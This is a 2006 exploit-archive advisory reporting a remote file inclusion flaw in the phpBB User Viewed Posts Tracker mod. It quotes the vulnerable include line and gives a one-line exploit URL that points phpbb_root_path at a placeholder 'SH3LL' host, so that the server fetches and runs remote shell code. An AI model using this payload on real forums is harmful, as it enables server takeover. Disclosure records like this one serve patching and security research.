phpbbViewed10.txt

2006-10-12T00:00:00
ID PACKETSTORM:50850
Type packetstorm
Reporter XORON
Modified 2006-10-12T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Discovered by XORON(turkish hacker)  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
URL: http://www.nivisec.com/downloads/phpbb/user_viewed_posts.zip  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Vuln. Code: include_once($phpbb_root_path . 'language/lang_' .  
$board_config['default_lang'] . '/lang_user_viewed_posts.' . $phpEx);  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Exploit:  
/includes/functions_user_viewed_posts.php?phpbb_root_path=http://SH3LL?  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
# milw0rm.com [2006-10-06]  
  
`